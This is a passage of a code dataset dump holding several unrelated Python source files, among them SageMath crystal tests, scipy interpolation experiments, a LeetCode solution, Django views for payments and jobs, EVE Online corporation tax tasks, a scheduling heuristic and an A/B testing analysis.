v.extend( [ x/max_height for x in root.associated_coroot().to_vector() ] )\n #v.insert(0, height/max_height)\n\n # the map from (root, height) --> _cmp_v is injective\n\n self._cmp_v = tuple(v)\n self.root = root\n self.height = height\n\n def _repr_(self):\n r\"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: vec = rl.from_vector(vector([1,1])); vec\n alpha[1] + alpha[2]\n sage: R(vec,1)\n (alpha[1] + alpha[2], 1)\n \"\"\"\n return \"(%s, %s)\" % (self.root, self.height)\n\n def __hash__(self):\n r\"\"\"\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: root = rl.from_vector(vector([1,1]))\n sage: vec = R(root,0)\n sage: hash(vec) == hash(vec)\n True\n \"\"\"\n return hash(self._cmp_v)\n\n def __eq__(self, other):\n r\"\"\"\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: v1 = rl.from_vector(vector([1,1]))\n sage: v2 = rl.from_vector(vector([1]))\n sage: x1 = R(v1,1) ; x2 = R(v1,0) ; x3 = R(v2,1)\n sage: x1.__eq__(x1)\n True\n sage: x1.__eq__(x2)\n False\n sage: x1.__eq__(x3)\n False\n \"\"\"\n try:\n return self._cmp_v == other._cmp_v\n except (NameError, AttributeError):\n return False\n\n def _richcmp_(self, other, op):\n r\"\"\"\n Define a total order on :class:`RootsWithHeightElement`. This defines\n the initial `\\lambda`-chain.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: v1 = rl.from_vector(vector([1,1]))\n sage: v2 = rl.from_vector(vector([1]))\n sage: x1 = R(v1,1) ; x2 = R(v1,0) ; x3 = R(v2,1)\n sage: x1 < x2\n False\n sage: x1 < x3\n True\n \"\"\"\n # I suspect that if you redefine this method to produce a\n # different (valid) `\\lambda`-chain the rest of the\n # code should still work.\n #todo: check if self and other have the same parent ?\n #assert self.parent() is other.parent(), \"elements have different parents\"\n return richcmp(self._cmp_v, other._cmp_v, op)\n\n\nRootsWithHeight.Element = RootsWithHeightElement\n\n#####################################################################\n# Test code, by comparing with existing crystal implementations.\n#####################################################################\n\n\ndef _test_some_specific_examples(clss=CrystalOfAlcovePaths):\n r\"\"\"\n Test against some specific (finite type) examples.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import _test_some_specific_examples\n sage: _test_some_specific_examples(crystals.AlcovePaths)\n G2 example passed.\n C3 example passed.\n B3 example 1 passed.\n B3 example 2 passed.\n True\n \"\"\"\n # This appears in Lenart.\n C = clss(['G',2],[0,1])\n G = C.digraph()\n\n GT = DiGraph({\n () : {(0) : 2 },\n (0) : {(0,8) : 1 },\n (0,1) : {(0,1,7) : 2 },\n (0,1,2) : {(0,1,2,9) : 1 },\n (0,1,2,3) : {(0,1,2,3,4) : 2 },\n (0,1,2,6) : {(0,1,2,3) : 1 },\n (0,1,2,9) : {(0,1,2,6) : 1 },\n (0,1,7) : {(0,1,2) : 2 },\n (0,1,7,9) : {(0,1,2,9) : 2 },\n (0,5) : {(0,1) : 1, (0,5,7) : 2 },\n (0,5,7) : {(0,5,7,9) : 1 },\n (0,5,7,9) : {(0,1,7,9) : 1 },\n (0,8) : {(0,5) : 1 }\n })\n\n if not G.is_isomorphic(GT):\n return False\n else:\n print(\"G2 example passed.\")\n\n # Some examples from Hong--Kang:\n\n # type C, ex. 8.3.5, pg. 189\n C = clss(['C',3],[0,0,1])\n G = C.digraph()\n GT = DiGraph({\n ():{ (0): 3},\n (0):{ (0, 6): 2},\n (0, 1):{ (0, 1, 3): 3, (0, 1, 7): 1},\n (0, 1, 2):{ (0, 1, 2, 3): 3},\n (0, 1, 2, 3):{ (0, 1, 2, 3, 8): 2},\n (0, 1, 2, 3, 4):{ (0, 1, 2, 3, 4, 5): 3},\n (0, 1, 2, 3, 8):{ (0, 1, 2, 3, 4): 2},\n (0, 1, 3):{ (0, 1, 3, 7): 1},\n (0, 1, 3, 7):{ (0, 1, 2, 3): 1, (0, 1, 3, 7, 8): 2},\n (0, 1, 3, 7, 8):{ (0, 1, 2, 3, 8): 1},\n (0, 1, 7):{ (0, 1, 2): 1, (0, 1, 3, 7): 3},\n (0, 6):{ (0, 1): 2, (0, 6, 7): 1},\n (0, 6, 7):{ (0, 1, 7): 2}\n })\n\n if not G.is_isomorphic(GT):\n return False\n else:\n print(\"C3 example passed.\")\n\n # type B, fig. 8.1 pg. 172\n C = clss(['B',3],[2,0,0])\n G = C.digraph()\n\n GT = DiGraph({\n ():{ (6): 1},\n (0):{ (0, 7): 2},\n (0, 1):{ (0, 1, 11): 3},\n (0, 1, 2):{ (0, 1, 2, 9): 2},\n (0, 1, 2, 3):{ (0, 1, 2, 3, 10): 1},\n (0, 1, 2, 3, 10):{ (0, 1, 2, 3, 4): 1},\n (0, 1, 2, 9):{ (0, 1, 2, 3): 2, (0, 1, 2, 9, 10): 1},\n (0, 1, 2, 9, 10):{ (0, 1, 2, 3, 10): 2},\n (0, 1, 5):{ (0, 1, 2): 3, (0, 1, 5, 9): 2},\n (0, 1, 5, 9):{ (0, 1, 2, 9): 3, (0, 1, 5, 9, 10): 1},\n (0, 1, 5, 9, 10):{ (0, 1, 2, 9, 10): 3},\n (0, 1, 8):{ (0, 1, 5): 3},\n (0, 1, 8, 9):{ (0, 1, 5, 9): 3, (0, 1, 8, 9, 10): 1},\n (0, 1, 8, 9, 10):{ (0, 1, 5, 9, 10): 3},\n (0, 1, 11):{ (0, 1, 8): 3},\n (0, 7):{ (0, 1): 2, (0, 7, 11): 3},\n (0, 7, 8):{ (0, 7, 8, 9): 2},\n (0, 7, 8, 9):{ (0, 1, 8, 9): 2},\n (0, 7, 8, 9, 10):{ (0, 1, 8, 9, 10): 2},\n (0, 7, 11):{ (0, 1, 11): 2, (0, 7, 8): 3},\n (6):{ (0): 1, (6, 7): 2},\n (6, 7):{ (0, 7): 1, (6, 7, 11): 3},\n (6, 7, 8):{ (0, 7, 8): 1, (6, 7, 8, 9): 2},\n (6, 7, 8, 9):{ (6, 7, 8, 9, 10): 1},\n (6, 7, 8, 9, 10):{ (0, 7, 8, 9, 10): 1},\n (6, 7, 11):{ (0, 7, 11): 1, (6, 7, 8): 3}\n })\n\n if not G.is_isomorphic(GT):\n return False\n else:\n print(\"B3 example 1 passed.\")\n\n C = clss(['B',3],[0,1,0])\n G = C.digraph()\n\n GT = DiGraph({\n ():{ (0): 2},\n (0):{ (0, 1): 1, (0, 7): 3},\n (0, 1):{ (0, 1, 7): 3},\n (0, 1, 2):{ (0, 1, 2, 8): 2},\n (0, 1, 2, 3):{ (0, 1, 2, 3, 5): 1, (0, 1, 2, 3, 9): 3},\n (0, 1, 2, 3, 4):{ (0, 1, 2, 3, 4, 5): 1},\n (0, 1, 2, 3, 4, 5):{ (0, 1, 2, 3, 4, 5, 6): 2},\n (0, 1, 2, 3, 5):{ (0, 1, 2, 3, 5, 9): 3},\n (0, 1, 2, 3, 5, 9):{ (0, 1, 2, 3, 4, 5): 3},\n (0, 1, 2, 3, 9):{ (0, 1, 2, 3, 4): 3, (0, 1, 2, 3, 5, 9): 1},\n (0, 1, 2, 5):{ (0, 1, 2, 3, 5): 2},\n (0, 1, 2, 8):{ (0, 1, 2, 3): 2},\n (0, 1, 2, 8, 9):{ (0, 1, 2, 3, 9): 2},\n (0, 1, 7):{ (0, 1, 2): 3, (0, 1, 7, 8): 2},\n (0, 1, 7, 8):{ (0, 1, 7, 8, 9): 3},\n (0, 1, 7, 8, 9):{ (0, 1, 2, 8, 9): 3},\n (0, 2):{ (0, 1, 2): 1, (0, 2, 5): 2},\n (0, 2, 5):{ (0, 2, 5, 8): 1},\n (0, 2, 5, 8):{ (0, 1, 2, 5): 1},\n (0, 7):{ (0, 1, 7): 1, (0, 2): 3}\n })\n\n if not G.is_isomorphic(GT):\n return False\n else:\n print(\"B3 example 2 passed.\")\n\n # type B, fig. 8.3 pg. 174\n\n return True\n\n\ndef compare_graphs(g1, g2, node1, node2):\n r\"\"\"\n Compare two edge-labeled :class:`graphs ` obtained from\n ``Crystal.digraph()``, starting from the root nodes of each graph.\n\n - ``g1`` -- :class:`graphs `, first digraph\n - ``g2`` -- :class:`graphs `, second digraph\n - ``node1`` -- element of ``g1``\n - ``node2`` -- element of ``g2``\n\n Traverse ``g1`` starting at ``node1`` and compare this graph with\n the one obtained by traversing ``g2`` starting with ``node2``.\n If the graphs match (including labels) then return ``True``.\n Return ``False`` otherwise.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import compare_graphs\n sage: G1 = crystals.Tableaux(['A',3], shape=[1,1]).digraph()\n sage: C = crystals.AlcovePaths(['A',3],[0,1,0])\n sage: G2 = C.digraph()\n sage: compare_graphs(G1, G2, C( () ), G2.vertices(sort=True)[0])\n True\n \"\"\"\n for out_edge in g1.outgoing_edges( node1 ):\n matched = False\n for o2 in g2.outgoing_edges( node2 ):\n if o2[2] == out_edge[2]:\n if matched:\n print(\"ERROR: Two edges with the same label for \", out_edge, \" exist.\")\n return False\n matched = True\n result = compare_graphs(g1, g2, out_edge[1], o2[1])\n if not result:\n return False\n if not matched:\n print(\"ERROR: No matching edge for \", out_edge, \".\")\n return False\n return True\n\n\ndef _test_against_tableaux(R, N, k, clss=CrystalOfAlcovePaths):\n r\"\"\"\n Test :class:`~sage.combinat.crystals.alcove_path.CrystalOfAlcovePaths`\n against all of the tableaux crystals of type `R` in rank `N` with\n highest weight given by a partition of `k`.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import _test_against_tableaux\n sage: _test_against_tableaux(['A',3], 3, 2)\n ** Shape [2]\n T has 10 nodes.\n C weight [2, 0, 0]\n C has 10 nodes.\n Compare graphs: True\n ** Shape [1, 1]\n T has 6 nodes.\n C weight [0, 1, 0]\n C has 6 nodes.\n Compare graphs: True\n \"\"\"\n from sage.combinat.partition import Partitions\n from sage.combinat.crystals.tensor_product import CrystalOfTableaux\n shapes = Partitions(k).list()\n for shape in shapes:\n print(\"** Shape \", shape)\n T = CrystalOfTableaux(R, shape = shape)\n ct = len(T.list())\n print(\" T has \", ct, \" nodes.\")\n #T.digraph().show(edge_labels=True)\n H = T.digraph()\n weight = T.module_generators[0].weight()\n w = [ weight.scalar(RootSystem(R).ambient_space().simple_coroot(i)) for i in range(1,N+1) ]\n print(\" C weight \", w)\n\n C = clss(R , w)\n\n cc = len(C.list())\n #C.digraph().show(edge_labels=True)\n G = C.digraph()\n print(\" C has \", cc, \" nodes.\")\n if cc != ct:\n print(\"FAIL: number of nodes differ.\", cc, ct)\n return\n print(\" Compare graphs: \", compare_graphs(G, H, C(()), H.vertices(sort=True)[0]))\n\n\ndef _test_with_lspaths_crystal(cartan_type, weight, depth=10):\n r\"\"\"\n Test if the digraphs generated are isomorphic to the ones generated by\n LS-path model.\n\n INPUT:\n\n - ``cartan_type`` -- Cartan type of a finite or affine untwisted root\n system\n - ``weight`` -- dominant weight as a list of (integral) coefficients of the\n fundamental weights\n - ``depth`` -- starting at the module generator how deep do you want to\n generate the crystal, useful for affine types\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import _test_with_lspaths_crystal\n sage: _test_with_lspaths_crystal(['A',3,1],[1,0,0,0],10) #long time\n True\n sage: _test_with_lspaths_crystal(['G',2,1],[1,0,0,0,0],10) #long time\n True\n \"\"\"\n from sage.combinat.crystals.littelmann_path import CrystalOfLSPaths\n G1 = CrystalOfAlcovePaths(cartan_type, weight).digraph(depth=depth)\n C = CrystalOfLSPaths(cartan_type, weight)\n G2 = C.digraph(subset=C.subcrystal(max_depth=depth, direction='lower'))\n\n return G1.is_isomorphic(G2, edge_labels=True)\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/combinat/crystals/alcove_path.py","file_name":"alcove_path.py","file_ext":"py","file_size_in_byte":70437,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"} +{"seq_id":"10215192620","text":"import numpy as np\nimport scipy as sp\nfrom scipy.interpolate import splev, splrep\nfrom scipy.interpolate.rbf import Rbf\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef main_2():\n x = np.linspace(0, 16, 16)\n # y = np.random.rand(16)\n y = np.sin(x)\n tck = splrep(x, y, k=3)\n x2 = np.linspace(0, 16, 48)\n y2 = splev(x2, tck)\n plt.subplot(211)\n plt.plot(np.linspace(0, 48, 48), y2)\n plt.subplot(212)\n plt.plot(x, y)\n plt.show()\n return\n # y2 has shape 32\n\n new_y2 = y2[12:48]\n y3 = new_y2[np.arange(0, 31, 2).astype(int)]\n y4 = new_y2[np.arange(1, 32, 2).astype(int)]\n\n plt.plot(x, y, 'r-', x, y3, 'g--', x, y4, 'b:')\n #plt.plot(x2,y2)\n plt.show()\n\ndef main_3():\n x = np.linspace(0, 16, 16)\n # y = np.random.rand(16)\n y = np.sin(x)\n tck = splrep(x, y, k=3)\n x2 = np.linspace(0, 16, 32)\n y2 = splev(x2, tck)\n # y2 has shape 32\n\n new_y2 = y2[0:0+16]\n y3 = new_y2[np.arange(0, 16, 1).astype(int)]\n\n plt.plot(x, y, 'r-', x, y3, 'g--')\n #plt.plot(x2,y2)\n plt.show()\n\ndef main_compress():\n x = np.linspace(1, 32, (32*5)/4)\n y = np.random.rand((32*5)/4)\n #y = np.sin(x)\n tck = splrep(x, y, k=3)\n rbf_adj = Rbf(x, y, function='gaussian')\n x2 = np.linspace(2, 33, 32)\n y2 = splev(x2, tck)\n y2_rbf = rbf_adj(x2)\n print(y2)\n print(y2_rbf)\n # y2 has shape 32\n\n plt.subplot(311)\n plt.plot(x, y)\n plt.subplot(312)\n #plt.plot(x2, y[8:8+16], 'r-', x2, y2, 'g--')\n plt.plot(x2,y2,'go-')\n #plt.plot(x2,y2)\n plt.subplot(313)\n plt.plot(x2, y2_rbf, 'ro-')\n plt.show()\n\ndef main_expand():\n x = np.linspace(1, 16, 16)\n y = np.random.rand(16)\n #y = np.sin(x)\n tck = splrep(x, y, k=3)\n x2 = np.linspace(1, 16, 32)\n y2 = splev(x2, tck)\n # y2 has shape 32\n\n #new_y2 = y2[8:8+32]\n #y3 = new_y2[np.arange(0, 31, 2).astype(int)]\n #y4 = new_y2[np.arange(1, 32, 2).astype(int)]\n plt.subplot(211)\n plt.plot(x, y)\n plt.subplot(212)\n plt.plot(np.linspace(1,32,32), y2)\n\n #plt.plot(x, y, 'r-', x, y3, 'g--', x, y4, 'b:')\n #plt.plot(x2,y2)\n plt.show()\n\ndef main():\n x = np.linspace(0, 16, 16)\n # y = np.random.rand(16)\n y = np.sin(x)\n tck = splrep(x, y, k=3)\n x2 = np.linspace(0, 16, 48)\n y2 = splev(x2, tck)\n # y2 has shape 32\n\n new_y2 = y2[8:8+32]\n y3 = new_y2[np.arange(0, 31, 2).astype(int)]\n y4 = new_y2[np.arange(1, 32, 2).astype(int)]\n\n plt.plot(x, y, 'r-', x, y3, 'g--', x, y4, 'b:')\n #plt.plot(x2,y2)\n plt.show()\n\nif __name__ == '__main__':\n main_compress()\n #main_expand()\n","repo_name":"mohitsharma0690/multi_scale_head_gesture","sub_path":"utils/temporal_augmentation.py","file_name":"temporal_augmentation.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"44588849210","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if(not head):\n return\n start = head.next if head.next else head\n prev = ListNode(val=100)\n while head and head.next:\n n = head.next\n print(prev.val,head.val,n.val)\n head.next = n.next\n n.next = head\n prev.next = n\n prev = head\n head = head.next\n return start\n","repo_name":"Protype8/LeetCode","sub_path":"Linked List/Swap Nodes in Pairs - LeetCode.py","file_name":"Swap Nodes in Pairs - LeetCode.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15824108926","text":"from calendar import monthrange\nfrom datetime import datetime, timedelta, date, timezone\nfrom functools import lru_cache\nfrom typing import Optional, Union\n\nimport requests\nfrom django.db import models\nfrom celery import shared_task\n\nfrom allianceauth.services.hooks import get_extension_logger\nfrom allianceauth.corputils.models import EveCorporationInfo\nfrom corptax.models import CorpTaxRate, CorpTaxSettings, CorpTaxOwed\nfrom corptools.models import CorporationWalletJournalEntry\n\nlogger = get_extension_logger(__name__)\nCORP_URL = 'https://esi.evetech.net/latest/corporations/{corp_id}/?datasource=tranquility'\n\n\n@shared_task\ndef update_tax_rate():\n today = datetime.today().date()\n for corp in EveCorporationInfo.objects.all():\n corp_name = corp.corporation_name\n corp_id = corp.corporation_id\n logger.info(f'Processing tax rate for {corp_name}')\n url = CORP_URL.format(corp_id=corp_id)\n response = requests.get(url)\n if response.status_code != 200:\n logger.error(f'Problem requesting corp info from CCP for corp {corp_id} {corp_name}')\n else:\n corp_data = response.json()\n tax_rate = corp_data.get('tax_rate')\n if tax_rate is None:\n logger.error(f'Problem with data returned by ccp for {corp_name}: {corp_data}')\n continue\n corp_tax_rate, created = CorpTaxRate.objects.update_or_create(corp=corp, date=today, defaults={'tax_rate': tax_rate})\n logger.info(f'Saved tax rate for {corp_name} on {today} as {tax_rate}')\n\n\n@shared_task\ndef update_corps_in_corp_settings():\n \"\"\"Update the corp list in CorpTaxSettings\"\"\"\n for corp in EveCorporationInfo.objects.all():\n settings = CorpTaxSettings.objects.filter(corp=corp)\n if not settings:\n corp_name = corp.corporation_name\n logger.info(f'Creating entry in CorpTaxSettings for {corp_name}')\n settings = CorpTaxSettings(corp=corp, taxed_at=None, taxed=False)\n settings.save()\n logger.info(f'Successfully created entry in CorpTaxSettings for {corp_name}')\n\n\n# @lru_cache(maxsize=128)\ndef _get_corp_tax_rate_for_day(corp: EveCorporationInfo, day: Union[datetime, date], strict: bool = False) -> float:\n \"\"\"\n Returns the tax rate of the corp on this day. If `strict` is set to False and no tax rate is found for the given day\n then the nearest tax rate known will be used. If no tax rate is found, None is returned\n \"\"\"\n corp_tax_rate = CorpTaxRate.objects.filter(corp=corp, date=day)\n if len(corp_tax_rate) == 1:\n return corp_tax_rate[0].tax_rate\n elif len(corp_tax_rate) > 1:\n msg = f'Multiple entries found for {corp.corporation_name} on {day}!'\n logger.error(msg)\n raise SystemError(msg)\n elif not strict:\n # Look for tax rate of nearest day\n closest_greater = CorpTaxRate.objects.filter(date__gt=day).order_by('date')\n closest_less = CorpTaxRate.objects.filter(date__lt=day).order_by('-date')\n\n closest_greater_diff = None\n closest_less_diff = None\n if len(closest_greater) > 0:\n closest_greater_diff = closest_greater[0].date - day\n if len(closest_less) > 0:\n closest_less_diff = day - closest_less[0].date\n\n if closest_greater_diff and closest_less_diff:\n # Take the closest date, if tied then take the lesser date\n return closest_greater[0].tax_rate if closest_greater_diff < closest_less_diff else closest_less[0].tax_rate\n elif closest_less_diff is None:\n return closest_greater[0].tax_rate\n elif closest_greater_diff is None:\n return closest_less[0].tax_rate\n else:\n logger.error(f'No tax rates found ever for {corp.corporation_name}')\n\n\n@shared_task\ndef update_tax_owed(month: int, year: Optional[int] = None):\n # _get_corp_tax_rate_for_day.cache_clear() # Clear the cache so that DB updates are handled\n month = datetime(year=datetime.today().year if year is None else year, month=month, day=1, tzinfo=timezone.utc)\n end_of_month = month + timedelta(days=monthrange(month.year, month.month)[1])\n for corp_settings in CorpTaxSettings.objects.filter(taxed=True, taxed_at__isnull=False):\n logger.info(f'Processing tax owed for corp {corp_settings.corp.corporation_name}')\n corp_id = corp_settings.corp.corporation_id\n total_owed = 0\n for wallet_entry in CorporationWalletJournalEntry.objects.filter(\n tax_receiver_id=corp_id,\n ref_type__in=['bounty_prizes', 'agent_mission_reward', 'ess_escrow_transfer', 'corporate_reward_payout'],\n date__gte=month,\n date__lt=end_of_month\n ).order_by('date'):\n tax_rate = _get_corp_tax_rate_for_day(corp_settings.corp, wallet_entry.date.date())\n if tax_rate == 0:\n logger.error(f'{corp_settings.corp} has a tax rate of 0')\n break # TODO tf do we do here?\n share_of_tax_owed_to_alliance = min(1.0, corp_settings.taxed_at/tax_rate)\n total_owed += float(wallet_entry.amount) * share_of_tax_owed_to_alliance\n\n corp_tax_owed, created = CorpTaxOwed.objects.update_or_create(corp=corp_settings.corp, month=month, defaults={'isk_owed': total_owed})\n logger.info(corp_tax_owed)\n\n\n@shared_task\ndef update_tax_owed_current_month():\n now = datetime.now().date()\n current_month = now.month\n current_year = now.year\n update_tax_owed(current_month, current_year)\n","repo_name":"voltatek/aa-corp-tax","sub_path":"corptax/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25926446970","text":"import paydunya\nfrom django.contrib import messages\n\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom django.conf import settings\nfrom order.models import Order\nfrom payment.services.paydunya import (\n get_invoice,\n get_items,\n get_user_and_course,\n invoice_confirmation,\n)\n\n# from .tasks import payment_completed\n\n# Activer le mode 'test'. Le debug est à False par défaut\npaydunya.debug = False\n\n# Configurer les clés d'API\npaydunya.api_keys = settings.PAYDUNYA_ACCESS_TOKENS\n\n\ndef payment_process(request):\n order_id = request.session.get(\"order_id\")\n user = request.user\n order = get_object_or_404(Order, id=order_id)\n total_cost = order.get_total_cost()\n items = get_items(order.items.all())\n order_item_first = order.items.all()[0]\n custom_data = get_user_and_course(\n order_item_first.course.id,\n user.id,\n )\n try:\n successful, response = get_invoice(\n items,\n total_cost,\n request.get_host(),\n custom_data=custom_data,\n )\n if successful:\n # payment_completed.delay(order.id)\n return redirect(response.get(\"response_text\"))\n except Exception:\n messages.error(request, \"Une erreur s'est produit, veuillez ressayer\")\n return redirect(\"cart:cart_detail\")\n\n\ndef payment_done(request):\n try:\n token = request.GET.get(\"token\")\n successful, response = invoice_confirmation(token)\n if successful:\n messages.success(request, \"Paiement reçu\")\n return render(request, \"payment/done.html\")\n except Exception:\n messages.error(request, \"Paiement non complete\")\n return redirect(\"cart:cart_detail\")\n\n\ndef payment_canceled(request):\n return render(request, \"payment/canceled.html\")\n","repo_name":"cbsBiram/xarala__ssr","sub_path":"src/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25286748739","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom .forms import IjRegister\nfrom .models import Job\n\n# Create your views here.\ndef add_show(request):\n if request.method == \"POST\":\n fm = IjRegister(request.POST)\n if fm.is_valid():\n jid = fm.cleaned_data[\"jid\"]\n jt = fm.cleaned_data[\"jobTitle\"]\n jp = fm.cleaned_data[\"jobPrice\"]\n c = fm.cleaned_data[\"company\"]\n cntr = fm.cleaned_data[\"contractor\"]\n jtime = fm.cleaned_data[\"jobtime\"]\n reg = Job(jid=jid,jobTitle=jt, jobPrice=jp,company=c,contractor=cntr,jobtime=jtime)\n reg.save()\n fm =IjRegister()\n else:\n fm = IjRegister()\n stud = Job.objects.all()\n\n return render(request, \"ij/add_show.html\", {\"form\": fm, \"stu\": stud})\n\n\ndef update_data(request, id):\n if request.method == \"POST\":\n pi = Job.objects.get(pk=id)\n fm = IjRegister(request.POST, instance=pi)\n if fm.is_valid():\n fm.save()\n return HttpResponseRedirect(\"/job\")\n else:\n pi = Job.objects.get(pk=id)\n fm = IjRegister(instance=pi)\n return render(request, \"ij/update.html\", {\"form\": fm})\n\n\ndef delete_data(request, id):\n if request.method == \"POST\":\n pi = Job.objects.get(pk=id)\n pi.delete()\n return HttpResponseRedirect(\"/job\")\n\n","repo_name":"simaranirout/nexus","sub_path":"instalJob/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1465620459","text":"'''Functions used to select order of solving sub problems'''\nimport numpy as np\nimport copy as copy\nimport time\nfrom solveSP import solveSP\n\ndef selectOrderSP(data, graphs, MPDuals, epsilon=1e-9, orderStrategy = 'random', constructionHeuristic = False):\n '''Selects order of solving sub problems based on a given strategy'''\n\n # Create order list\n order = copy.copy(data['Employees'])\n # Select order based on order strategy\n order = globals()['orderStrategy_%s' % orderStrategy](order = order, data = data,\n graphs = graphs, MPDuals = MPDuals,\n epsilon = epsilon,\n constructionHeuristic = constructionHeuristic)\n return order\n\ndef orderStrategy_random(order, data, graphs, MPDuals, epsilon, constructionHeuristic):\n '''Shuffling order of SPs randomly'''\n\n np.random.shuffle(order)\n return order\n\ndef orderStrategy_noResourcesSP(order, data, graphs, MPDuals, epsilon, constructionHeuristic):\n '''Solves all SPs without resources, and selects order based on ascending\n objective value.'''\n \n timeStart = time.time()\n # Preallocate space for solutions\n SPobjectives = dict.fromkeys(e for e in data['Employees'])\n SPsolutions = dict.fromkeys(e for e in data['Employees'])\n objectives = np.zeros(data['nEmployees']) # List of objectives to sort later\n # Solve SP without resources for each employee\n for employee in data['Employees']:\n [SPobjectives[employee],\n SPsolutions[employee]] = solveSP(data=data, employee=employee,\n graph=graphs[employee],\n duals=MPDuals, epsilon=epsilon,\n resourceVec = [],\n constructionHeuristic = constructionHeuristic)\n\n # Add employee to order if solutions were found\n if SPobjectives[employee] != None:\n objectives[employee - 1] = SPobjectives[employee][1]\n # If no solution was found, return None as one of the SPs is infeasible\n else:\n return None\n\n # Sort order after ascending SP objective value\n order = [x for _,x in sorted(zip(objectives,order))]\n\n return order\n","repo_name":"sandercoates/HRP","sub_path":"model/selectOrderSP.py","file_name":"selectOrderSP.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43130624421","text":"\n############################################\n# AB Testing\n############################################\n\n###################################################\n# Imports, Functions and Settings.\n###################################################\n\nimport pandas as pd\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.stats import shapiro, levene, ttest_ind, mannwhitneyu\nfrom statsmodels.stats.proportion import proportions_ztest\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\npd.set_option('display.float_format', lambda x: '%.5f' % x)\npd.set_option('display.width', 500)\n\ndef check_df(dataframe,head=5):\n print(\"##Shape##\")\n print(dataframe.shape)\n print(\"##Types##\")\n print(dataframe.dtypes)\n print(\"##Head##\")\n print(dataframe.head(head))\n print(\"##Tail##\")\n print(dataframe.tail(head))\n print(\"##Missingentries##\")\n print(dataframe.isnull().sum())\n print(\"##Quantiles##\")\n print(dataframe.quantile([0,0.05,0.50,0.95,0.99,1]).T)\n print(\"##generalinformation##\")\n print(dataframe.describe().T)\n\n\n###################################################\n# Importing data and taking a first look\n###################################################\n\ndf_control = pd.read_excel(\"ab_testing_veri/ab_testing.xlsx\" , sheet_name=\"Control Group\")\ndf_test = pd.read_excel(\"ab_testing_veri/ab_testing.xlsx\" , sheet_name=\"Test Group\")\n\ncheck_df(df_control)\ncheck_df(df_test)\noriginalCols = df_control.columns\n#Adding the test group to the control group\ndf_control[\"Group\"] = \"Control\"\ndf_test[\"Group\"] = \"Test\"\n\ndf = pd.concat([df_control,df_test],axis=0,ignore_index=False)\ndf.head()\n\n## A/B Test\n\n# H0 : M1 = M2 There is no significant difference between the purchases of the test and control groups.\n# H1 : M1!= M2 There is a significant difference between the purchases of the test and control groups.\n\n# Average purchases for both test and control groups\n\ndf.groupby(\"Group\").mean()\n# Impression Click Purchase Earning\n# Group\n# Control 101711.44907 5100.65737 550.89406 1908.56830\n# Test 120512.41176 3967.54976 582.10610 2514.89073\n# We can see that there is an increment, but it might happen by chance.\n\n################################################################\n\n## Before getting into A/B testings, we should check the assumptions first by\n##Testing normality and homogeneity of variance for independent samples t-tests\n\n## Normality Test:\n\n# H0: the population is normally distributed\n# H1: the population is not normally distributed\n# p < 0.05 H0 Rejected\n# p > 0.05 H0 Can't be rejected\n\n## Check the normality in the Control group:\n\nfor col in originalCols:\n test_stat, pvalue = shapiro(df.loc[df[\"Group\"] == \"Control\", col])\n print(col + ' Results: \\n Test Stat = %.4f, p-value = %.4f\\n' % (test_stat, pvalue))\n\n# Control Group normality test:\n\n# Impression Results:\n# Test Stat = 0.9697, p-value = 0.3514\n\n# Click Results:\n# Test Stat = 0.9844, p-value = 0.8461\n\n# Purchase Results:\n# Test Stat = 0.9773, p-value = 0.5891\n\n# Earning Results:\n# Test Stat = 0.9756, p-value = 0.5306\n\n# HO Can't be rejected for all the variables, which means it's normally distributed.\n\n\n## Check the normality in the Test group:\nfor col in originalCols:\n test_stat, pvalue = shapiro(df.loc[df[\"Group\"] == \"Test\", col])\n print(col + ' Results: \\n Test Stat = %.4f, p-value = %.4f\\n' % (test_stat, pvalue))\n\n# Test Group normality test:\n\n# Impression Results:\n# Test Stat = 0.9720, p-value = 0.4148\n#\n# Click Results:\n# Test Stat = 0.9896, p-value = 0.9699\n#\n# Purchase Results:\n# Test Stat = 0.9589, p-value = 0.1541\n#\n# Earning Results:\n# Test Stat = 